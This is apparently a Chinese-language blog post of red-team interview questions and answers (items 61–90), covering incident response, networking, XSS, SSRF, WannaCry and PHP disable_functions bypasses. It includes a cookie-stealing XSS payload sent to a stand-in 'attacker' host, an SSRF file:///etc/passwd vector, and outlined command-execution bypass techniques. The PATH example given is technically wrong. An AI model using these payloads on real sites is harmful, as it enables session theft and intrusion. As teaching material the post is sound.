网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
渗透测试红队面试三
六十一、主机被入侵,你会如何处理这件事自查解决方案: 六十二、 NAT(网络地址转换)协议 六十三、内网穿透 六十四、虚拟专用网络 六十五、二层交换机 六十六、路由技术 六十七、三层交换机 六十八、IPv6 地址表示 六十九、对称加密非对称加密? 七十、什么是同源策略? 七十一、cookie 存在哪里?可以打开吗 七十二、xss 如何盗取 cookie? 七十三、tcp、udp 的区别及 tcp 三次握手,syn 攻击? 七十四、证书要考哪些? 七十五、DVWA 是如何搭建的? 七十六、渗透测试的流程是什么 七十七、xss 如何防御 七十八、IIS 服务器应该做哪些方面的保护措施: 七十九、虚拟机的几种连接方式及原理 八十、xss 有 cookie 一定可以无用户名密码登录吗? 八十一、 JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的? 八十二、Frida 和 Xposed 框架? 八十三、SSRF 利用方式? 八十四、宏病毒? 八十五、APP 加壳? 八十六、勒索软件 Wanacry 的特征?蠕虫、僵尸病毒 八十七、ARM32 位指令中,返回值和返回地址保存在哪个寄存器中? 八十八、HTTPS 握手过程中用到哪些技术? 八十九、Linux 中 PHP 环境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system, 九十、请写出两种有可能实现任意命令执行的方式?
六十一、主机被入侵自查解决方案
- 隔离与止损
- 立即断开网络连接,阻断攻击者持续访问路径;备份当前系统状态(内存镜像、磁盘快照)用于取证。
- 禁用可疑账户,检查系统日志(如
/var/log/auth.log
或Windows事件查看器)定位异常登录记录。- 漏洞分析与修复
- 使用工具(如
rkhunter
、ClamAV
)扫描后门程序;比对文件哈希值识别篡改文件。- 修复已知漏洞,更新系统补丁,关闭非必要服务端口(如
netstat -ano
排查)。- 加固与监控
- 配置防火墙规则(如iptables/Windows防火墙)、启用IDS/IPS系统;部署HIDS(主机入侵检测系统)。
- 审计SSH密钥、口令策略;启用多因素认证(MFA)。
六十二、NAT(网络地址转换)协议
- 核心功能
- 解决IPv4地址短缺问题,通过映射内网私有IP到公网IP(如PAT实现端口复用)。
- 静态NAT(一对一映射)、动态NAT(地址池分配)、PAT(Port Address Translation,NAT Overload)。
- 应用场景
- 家庭路由通过NAT共享公网IP;企业内网隐藏真实拓扑结构。
- 局限性
- 破坏端到端透明性,导致P2P应用穿透困难(需STUN/TURN协议辅助)。
六十三、内网穿透
- 技术原理
- 反向代理(如Ngrok):公网服务器中转内网服务流量。
- 隧道技术(如SSH隧道、VPN):封装内网流量绕过防火墙。
- 典型工具
- Frp:支持TCP/UDP端口映射;ZeroTier:基于P2P的虚拟局域网。
- 安全风险
- 暴露内网服务可能引入攻击面(如未授权访问数据库)。
六十四、虚拟专用网络(VPN)
- 核心机制
- 加密隧道(IPsec/OpenVPN)保障数据机密性;支持远程访问内网资源。
- 协议对比
- IPsec(网络层加密,兼容性差)、SSL VPN(基于HTTPS,易穿透防火墙)。
- 企业应用
- 分支机构互联(Site-to-Site VPN);员工远程办公(Client-to-Site VPN)。
六十五、二层交换机
- 工作原理
- 基于MAC地址表转发帧,支持VLAN划分隔离广播域。
- 局限性
- 无法跨子网通信,需依赖路由器或三层交换机。
六十六、路由技术
- 路由类型
- 静态路由(手动配置)、动态路由协议(OSPF、BGP基于链路状态或路径矢量)。
- NAT与负载均衡
- 结合策略路由实现流量分流(如企业多出口场景)。
六十七、三层交换机
- 核心特性
- 集成路由功能(基于ASIC硬件加速),支持VLAN间路由。
- 应用场景
- 数据中心核心层实现高速路由转发。
六十八、IPv6地址表示
- 格式规则
- 8组16进制数(如
2001:0db8:85a3::8a2e:0370:7334
),省略前导零和连续零组。- 地址类型
- 单播(Global Unicast)、组播(Multicast)、链路本地(FE80::/10)。
六十九、对称加密与非对称加密
- 对称加密(AES)
- 加解密密钥相同,速度快,适合大数据量传输。
- 非对称加密(RSA)
- 公钥加密、私钥解密,解决密钥分发问题(如SSL证书交换)。
- 混合应用
- TLS握手阶段用RSA交换AES会话密钥。
七十、同源策略
- 定义
- 浏览器阻止跨域脚本访问其他源的DOM/Cookie(同源:协议+域名+端口一致)。
- 绕过机制
- CORS(服务端设置
Access-Control-Allow-Origin
)、JSONP(动态插入<script>
标签)。
七十一、Cookie存储与访问
- 存储位置
- 浏览器本地(Chrome:
chrome://settings/siteData
),受HttpOnly
标记限制脚本访问。- 安全风险
- 明文存储敏感信息可能被XSS窃取(需Secure+HttpOnly+SameSite防护)。
七十二、XSS盗取Cookie
- 攻击流程
- 注入
<script>document.location='http://attacker/?cookie='+document.cookie</script>
。- 防御措施
- 设置
HttpOnly
阻止JS读取Cookie;输入过滤与输出编码。
七十三、TCP与UDP区别及SYN攻击
- 协议对比
- TCP可靠传输(ACK确认、重传)、面向连接;UDP无连接、低延迟(适合音视频流)。
- 三次握手
- SYN→SYN-ACK→ACK;SYN攻击通过伪造源IP耗尽服务器半连接队列。
- 防御手段
- SYN Cookie机制(无状态验证)、限制并发半连接数。
七十四、安全证书
- 认证体系
- OSCP(渗透测试)、CISSP(安全管理)、CEH(道德黑客)。
- 技能方向
- 网络攻防(PNPT)、云安全(CCSP)、逆向工程(GREM)。
七十五、DVWA搭建
- 依赖环境
- LAMP/WAMP环境(PHP 5+、MySQL);配置
config.inc.php
设置数据库连接。- 漏洞配置
- 手动调整安全等级(Low/High)模拟不同难度场景。
七十六、渗透测试流程
- 阶段划分
- 信息收集(Whois、Nmap)、漏洞扫描(Nessus)、利用(Metasploit)、后渗透(权限维持)。
- 合规性
- 授权书(Scope定义)、规避法律风险(如避免DoS攻击)。
七十七、XSS防御
- 输入过滤
- 白名单校验(如仅允许字母数字);转义特殊字符(
<
→<
)。- CSP策略
- 响应头
Content-Security-Policy
限制脚本来源(如'self'
)。
七十八、IIS防护
- 加固措施
- 禁用WebDAV、关闭目录遍历;配置请求过滤规则(拒绝
../
路径)。- 日志审计
- 启用W3C日志记录,监控异常请求(如大量404错误)。
七十九、虚拟机连接方式
- 桥接模式
- 虚拟机直接接入物理网络,独立IP(类似独立主机)。
- NAT模式
- 共享宿主机IP,通过虚拟NAT设备进行地址转换。
八十、XSS与Cookie登录
- 条件限制
- 需目标站点会话仅依赖Cookie(无IP绑定/MFA);若Cookie标记Secure则需HTTPS劫持。
八十一、JNI函数名转换
- 命名规则
- C函数名格式:
Java_完整类名_方法名
(如Java_com_didi_security_main
),特殊字符用_1
转义。
八十二、Frida与Xposed
- Frida特性
- 动态插桩(D-Bus通信),支持跨进程Hook(如Android/iOS应用内存修改)。
- Xposed局限
- 需Root环境,基于模块化Hook框架(全局生效)。
八十三、SSRF利用
- 攻击向量
- 利用协议处理漏洞(如
file:///etc/passwd
、dict://
探测内网端口)。- 绕过技巧
- 域名重定向(短网址)、IPv6地址格式混淆。
八十四、宏病毒
- 传播方式
- 依附Office文档宏代码,利用社会工程诱导启用宏。
- 检测清除
- 禁用宏执行;使用杀毒软件扫描
*.docm
文件。
八十五、APP加壳
- 技术原理
- 加密DEX/ELF文件,运行时动态解密(如梆梆安全、UPX)。
- 对抗脱壳
- 反调试检测、多壳嵌套、代码混淆(OLLVM)。
八十六、WannaCry特征
- 传播方式
- 利用SMB漏洞(EternalBlue)横向扩散;加密文件扩展名(
.WNCRY
)。- 防御措施
- 关闭445端口;安装MS17-010补丁。
八十七、ARM32返回值与返回地址
- 寄存器分配
- 返回值:R0(32位)/R0-R1(64位);返回地址:LR(R14),函数退出时通过
BX LR
跳转。
八十八、HTTPS握手技术
- 密钥交换
- ECDHE算法生成临时密钥(前向保密);RSA验证证书链。
- 会话复用
- Session ID/Ticket减少握手开销。
八十九、PHP disable_functions绕过
- 未禁用函数利用
mail()
函数通过LD_PRELOAD
注入共享库;imagick
模块处理恶意图片触发命令。- 反序列化漏洞
- 利用
phar://
协议触发反序列化操作链(如GadgetChain
)。
九十、任意命令执行方式
- 环境变量注入
- 控制
PATH
变量指向恶意二进制(如echo /tmp > PATH
)。- 外部程序调用
- 利用
ImageMagick
处理漏洞(CVE-2016-3714)执行系统命令。